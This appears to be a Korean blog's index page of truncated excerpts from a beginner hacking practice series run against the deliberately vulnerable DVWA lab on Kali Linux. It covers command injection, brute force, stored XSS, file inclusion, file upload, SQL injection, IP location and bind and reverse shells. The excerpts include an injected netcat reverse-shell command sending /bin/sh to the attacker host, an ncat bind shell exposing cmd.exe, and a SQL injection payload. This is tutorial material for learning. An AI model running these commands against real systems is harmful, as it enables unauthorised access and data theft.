해킹 슈퍼 기초 연습 (20) 썸네일형 리스트형 dvwa Command Execution command execution은 운영체제 명령을 실행할 수 있는 취약점을 말합니다. 이주 직관적인 예시가 dvwa에 있습니다.dvwa를 켜고 command execution으로 가줍니다. ping ip를 입력하라고 합니다. 여기에 8.8.8.8을 넣어줍니다. ping {입력}을 하는 명령인 것 같습니다. 그럼 여기에 8.8.8.8;ls를 넣어줍시다. 아래쪽에 현재 위치의 파일 목록을 보여줍니다.8.8.8.8;ifconfig를 입력하면 ip를 보여줍니다. 이제 리버스 쉘 공격을 해봅시다. 먼저 칼리 리눅스에서 nc -nlvp 7777를 실행해 포트를 열어둡니다. 그리고 8.8.8.8;nc -nv 172.30.1.58 7778 -e /bin/sh를 입력합니다. 아무것도 실행이 안되는 것을 보니 -e 옵.. dvwa brute force brute force는 모든 데이터를 다 집어넣는 공격 방식입니다.dvwa를 켜고 brute force 탭으로 들어갑니다. admin이라는 계정의 비밀번호를 탈취해 볼 것입니다. 아이디에 admin, 비밀번호에 아무꺼나 넣고 로그인해 봅시다.저는 그럴듯한 비밀번호를 계속 넣어볼 것입니다. 근데 손으로 하면 힘드니 burpsuite라는 프로그램을 이용해 볼 것입니다.터미널을 열고 burfsuite를 입력해 줍니다.그렇게 설치하면 다음 화면이 나옵니다. 프록시를 열어 줄 것입니다. proxy - proxy setting으로 갑니다.127.0.0.1:8080의 포트를 1234로 바꿔 줄 것입니다. edit을 누르고 port에 1234를 입력합니다. 이러면 1234포트에 프록시를 여는 데까지 성공했습니다. 파이.. dvwa xss 공격 xss(크로스 사이트 스크립팅)공격은 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입할 수 있는 취약점이라고 합니다. 가끔 학교 게시판 같은데 가면 제목이 혼자 이상하게 되어 있는 게시글이 있는데 이게 xss 공격입니다. 한번 실습해 보도록 하겠습니다. dvwa의 xss stored로 갑니다. 여기 들어가면 게시글 같은 게 보입니다. 여기에 글을 적으면 사람들에게 보여집니다. 그럼 message에 helo을 입력하면 어떻게 될까요?이제 여기에 alert("1");를 적어봅시다.그럼 이 페이지에 오는 사람들은 이런 알림을 받게 됩니다. 여기에서 단순한 알림이 아니라 악성 코드가 실행되면 정말 좋을 것 같습니다. 터미널에서 apt install beef-xss를 입력해 봅시다. xss 공격을 하기 쉽게.. dvwa file inclusion 저희는 웹 개발을 할 때 자주 쓰는 파일들을 만들어 두고 그 파일을 불러와 사용하는 경우가 있습니다. 예를 들면 아래 그림의 윗부분을 모든 페이지마다 만들려면 너무 힘듭니다. 만약 메뉴가 하나라도 추가되면 모든 페이지를 다 수정해 줘야 합니다. 이를 막기 위해 미리 메뉴를 만들어 두고 그 파일을 불러오는 것입니다. 그렇다면 불러오는 파일을 저희가 지정할 수 있다면 악성 코드를 실행할 수도 있을 것입니다. dvwa의 file inclusion으로 가봅시다. 위의 경로를 보면 page=include.php가 있는 것을 볼 수 있습니다.(물론 이렇게 대놓고 있는 경우는 없을 것입니다.) include.php를 /etc/passwd로 바꿔 봅시다.위에 유저 정보들이 쭉 나오는 것을 알 수 있습니다. 그럼 이 전.. dvwa 파일 업로드 취약점 virtual box에서 dvwa와 kali 리눅스를 실행합니다.dvwa에서 ifconfig를 입력해서 ip를 알아내고 kali 리눅스에 입력합니다.id는 admin password는 password로 바꿔서 로그인 하고 security level을 low로 바꿔줍니다. 이제 왼쪽 탭에서 upload 탭을 누르면 모든 준비가 끝납니다. leafpad를 쓰든 vi를 쓰든 해서 test_php.php 파일을 만듭니다. 해당 파일에를 입력해 줍니다. 이제 이 파일을 업로드 해 줍니다. 아주 친절하게 어디에 업로드가 되었는지 다 알려줍니다. 해당 경로로 들어가 봅시다.저희가 올린 파일이 실행되는 것을 볼 수 있습니다. 만약 hello가 아니라 악성 코드가 들어있다면 저희는 이 사이트를 털 수 있습니다. 터미널에.. dvwa sql injection 저번에 구축한 dvwa 실습 환경을 실행하고 ifconfig를 터미널에 입력해 줍니다. 그렇게 나온 ip을 브라우저에 입력해 주고 id에 admin, password에 password를 입력해 줍니다. 그리고 왼쪽에 있는 sql injection으로 들어가 줍니다. 유저 아이디를 넣으면 해당 정보가 나오는 창인 것 같습니다. 1을 넣어봅시다.아마 sql 쿼리가select * from user where id='{입력}' 이런 형식일 것 같네요. 그럼 입력으로 1' or '1'='1을 넣으면 어떻게 될까요? select * from user where id='1' or '1'='1' 이 되면서 모든 정보를 출력할 수 있습니다. ip 위치 추적 가끔 보면 ip로 위치 추적을 한다는 이야기를 듣습니다. 완벽한 것은 아니지만 대략 어디에 있는지 정도는 알 수 있습니다.집 위치 추적우선 자신의 집 주소를 알아낸다고 해 봅시다. cmd 창을 열어 ipconfig를 입력해 ip을 알아냅니다. 이제 ip location을 구글에 검색해서 해당 사이트에 들어갑니다(https://www.iplocation.net/).여기에 ip를 입력하면 위치가 나옵니다. 정확히 일치하거나 그러진 않지만 어느 지역인지는 대략적으로 알 수 있겠네요.남의 컴퓨터 위치 추적구글의 서버 위치를 알아봅시다. 다시 칼리 리눅스를 열고 터미널에 apt install dnsutils를 입력합니다. dns와 관한 일을 할 수 있게 해줍니다.이제 nslookup을 입력하고 www.google.. 쉘 털어보기 바인딩 쉘개념기본적인 흐름은 다음과 같습니다.피해자가 공격자에게 포트를 열어줍니다. 해당 포트로 들어오면 권한을 획득할 수 있습니다.공격자가 해당 포트로 접속을 합니다.물론 피해자가 스스로 열어줄 일은 없으니 이걸 열 수 있도록 공격자가 열심히 조작합니다.방화벽에서 특정 포트만 허용해 줌으로써 막을 수 있습니다.실습리눅스였다면 nc 명령어로 쉽게 할 수 있지만 윈도우는 그 명령어가 없기 때문에 윈도우의 특정 포트를 열어주는 프로그램을 설치합니다. https://github.com/cyberisltd/NcatPortable에 있 ncat.exe를 설치하고 설치한 위치에서 cmd 창을 엽니다.해당 창에서 ncat.exe -nlvp 7777 -e cmd.exe 를 입력합니다. -n : 호스트명과 포트를 이름이.. kioptrix, DVWA 세팅 kioptrix 세팅kioptrix를 한번 세팅해 보겠습니다. kioptrix 공식 페이지(https://www.vulnhub.com/entry/kioptrix-level-1-1,22/)로 갑니다. 여기서 Download (Mirror):를 다운받고 압축을 풀어줍니다. 그리고 virtual box에서 새로 만들기를 클릭합니다.종류를 linux, 버전을 linux 2.2로 해줍니다. 가상 하드 디스크는 굳이 만들지 않도록 합시다. 이거 없으면 막 안된다고 하는데 일단 넘어가 줍니다. 설정 - 저장소 - 컨트롤러 : IDE의 제일 오른쪽 아이콘을 클릭합니다. 여기서 추가를 클릭하고 다운받은 파일을 추가해 줍니다. 그리고 네트워크 탭에 가서 이전에 해 준 것처럼 네트워크 설정을 해줍니다. DVWA 세팅vuln.. 칼리 리눅스 설치 아주 기초적인 해킹을 실습하고 내용을 저장해 두는 페이지입니다. virtual box 설치칼리 리눅스는 os 중 하나로 해킹 관련 툴이 기본적으로 설치되어 있어 입문할 때 많이 씁니다. virtual box로 가상 환경을 하나 만들어 칼리 리눅스를 실행해 봅시다. virtual box 홈페이지(https://www.virtualbox.org/)에 있는 다운로드를 클릭합니다.그리고 os 환경에 맞는 virtual box를 다운로드합니다. 칼리 리눅스 설치kali linux 공식 홈페이지(https://www.kali.org/get-kali/#kali-platforms)로 갑니다. 쭉 아래로 내리다 보면Pre-built Virtual Machines라고 하면서 가상 환경에 설치하는 파일이 있습니다. 저희는 .. 이전 1 2 다음
